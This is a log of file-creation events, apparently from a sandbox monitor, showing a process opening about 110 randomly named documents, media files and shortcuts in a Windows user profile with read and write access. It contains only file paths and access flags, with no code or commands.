Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\oWuD6cFhx.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\EfuTYTPiCx LOe.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\F1NPm.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\LyCXLD1At.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\MFCCzusoQ99IUVZOnO.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\RzVVuYwX5ISIAY3GJCd.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\USjQB.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\EVQWdEk.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\FktDzr_Il x_4yzD.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\mmUH6saj5D04se1Ny.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\v3vmN1a.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\4fiD3H F26C.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\FF1E_qOk_q3b2hS6Wq.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\02kt3FBU.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\1rim73kXzbZdPVb.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\GcIb4JtMTQ.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\hxwsGGSX.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\QUfuVrMTFwGhP.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\WPd8.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\xdcv4NFG2H1C8.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
